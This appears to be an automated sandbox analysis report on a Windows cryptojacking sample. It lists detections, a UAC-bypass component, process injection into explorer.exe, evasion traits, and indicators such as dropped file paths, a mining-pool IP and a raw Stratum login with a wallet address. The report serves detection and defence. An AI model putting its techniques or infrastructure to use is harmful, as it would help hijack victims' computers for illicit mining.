Windows Analysis Report
GcqJPBLD2Q.exe

Overview

General Information

Sample name:	GcqJPBLD2Q.exe renamed because original name is a hash value
Original sample name:	831c0b3184feb755997ee1ec5e474ca8.exe
Analysis ID:	1528492
MD5:	831c0b3184feb755997ee1ec5e474ca8
SHA1:	45daae9fbc40e84523ff7bf15742f6bf7bac1462
SHA256:	3deb1c82c0d030534d168b9857c7ed13815917146448e1ab6844f4a90edc2a7d
Tags:	32exe
Infos:

Detection

BitCoin Miner, SilentXMRMiner, UACMe, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Xmrig

System process connects to network (likely due to code injection or exploit)

Yara detected BitCoin Miner

Yara detected SilentXMRMiner

Yara detected UACMe UAC Bypass tool

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Allocates memory in foreign processes

Creates a thread in another existing process (thread injection)

Detected Stratum mining protocol

Encrypted powershell cmdline option found

Found direct / indirect Syscall (likely to bypass EDR)

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
UACMe	A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.	No Attribution	https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ https://github.com/hfiref0x/UACME	https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: GcqJPBLD2Q.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Avira: detection malicious, Label: HEUR/AGEN.1344832
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Avira: detection malicious, Label: HEUR/AGEN.1344202
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Avira: detection malicious, Label: HEUR/AGEN.1344202

Multi AV Scanner detection for submitted file

Source: GcqJPBLD2Q.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: GcqJPBLD2Q.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe

Code function: 5_2_00007FF6FE422F80 _errno,wcstol,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,CharLowerW,lstrlenA,CryptStringToBinaryA,CryptStringToBinaryA,#40,_invalid_parameter_noinfo_noreturn,memcpy,FindFirstFileW,_invalid_parameter_noinfo_noreturn,FindClose,ShellExecuteW,_invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,LocalFree,CloseHandle,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,

5_2_00007FF6FE422F80

Exploits

Yara detected UACMe UAC Bypass tool

Source: Yara match	File source: 0.2.GcqJPBLD2Q.exe.35f5ad0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DccwBypassUAC.exe.7ff6fe420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GcqJPBLD2Q.exe.35e1868.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GcqJPBLD2Q.exe.3609d68.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GcqJPBLD2Q.exe.35e1868.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DccwBypassUAC.exe.7ff6fe420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2143738262.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2150159219.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GcqJPBLD2Q.exe PID: 5160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DccwBypassUAC.exe PID: 4368, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe, type: DROPPED

Bitcoin Miner

Yara detected BitCoin Miner

Source: Yara match

File source: Process Memory Space: conhost.exe PID: 6036, type: MEMORYSTR

Yara detected SilentXMRMiner

Source: Yara match	File source: Process Memory Space: conhost.exe PID: 6036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 2848, type: MEMORYSTR

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2242162134.0000024769431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2232579749.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2263942655.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2260012653.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2244730823.000002476943C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2230448544.0000024769438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2243392476.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2241271993.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2256496200.0000024769432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2220629227.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 2848, type: MEMORYSTR

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.6:49759 -> 45.76.89.70:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 36 52 4e 78 53 53 45 71 63 50 75 76 34 68 77 45 48 6b 4a 66 37 6b 56 48 46 57 73 38 62 70 72 51 4a 70 4d 50 78 44 63 52 78 36 52 54 51 78 5a 57 37 72 42 79 69 58 55 34 43 6e 4d 44 71 72 48 4c 34 73 37 56 45 70 4d 47 38 51 6a 37 37 79 67 64 44 52 76 6b 42 55 33 4e 63 64 31 57 78 22 2c 22 70 61 73 73 22 3a 22 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 35 2e 32 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 61 73 74 72 6f 62 77 74 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}

Found strings related to Crypto-Mining

Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Uses 32bit PE files

Source: GcqJPBLD2Q.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: GcqJPBLD2Q.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\DccwBypassUAC.pdbp^ source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmC:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\DccwBypassUAC\x64\Release\vc143.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb''$GCTL source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp, DccwBypassUAC.exe, 00000005.00000000.2143738262.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp, DccwBypassUAC.exe, 00000005.00000002.2150159219.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG:FULL /PDB:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\DccwBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.lib /MACHINE:X64 source: GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 6C:\Users\user\AppData\Local\Temp\DccwBypassUAC.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: cwdC:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\DccwBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG:FULL /PDB:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\DccwBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.lib /MACHINE:X64 source: GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\miles\Downloads\DccwBypassUAC-1.0.0\DccwBypassUAC\x64\Release\DccwBypassUAC.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.0000000016411000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000162E8000.00000004.00000800.00020000.00000000.sdmp, GcqJPBLD2Q.exe, 00000000.00000002.2147196529.00000000161BF000.00000004.00000800.00020000.00000000.sdmp, DccwBypassUAC.exe, 00000005.00000000.2143738262.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp, DccwBypassUAC.exe, 00000005.00000002.2150159219.00007FF6FE426000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: DccwBypassUAC.pdb source: GcqJPBLD2Q.exe, 00000000.00000002.2146963912.0000000003551000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe

5_2_00007FF6FE422F80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 45.76.89.70 80

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.6:49617 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.6:49759 -> 45.76.89.70:80

Source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5061000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000007.00000002.2190959451.00000236C70F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, 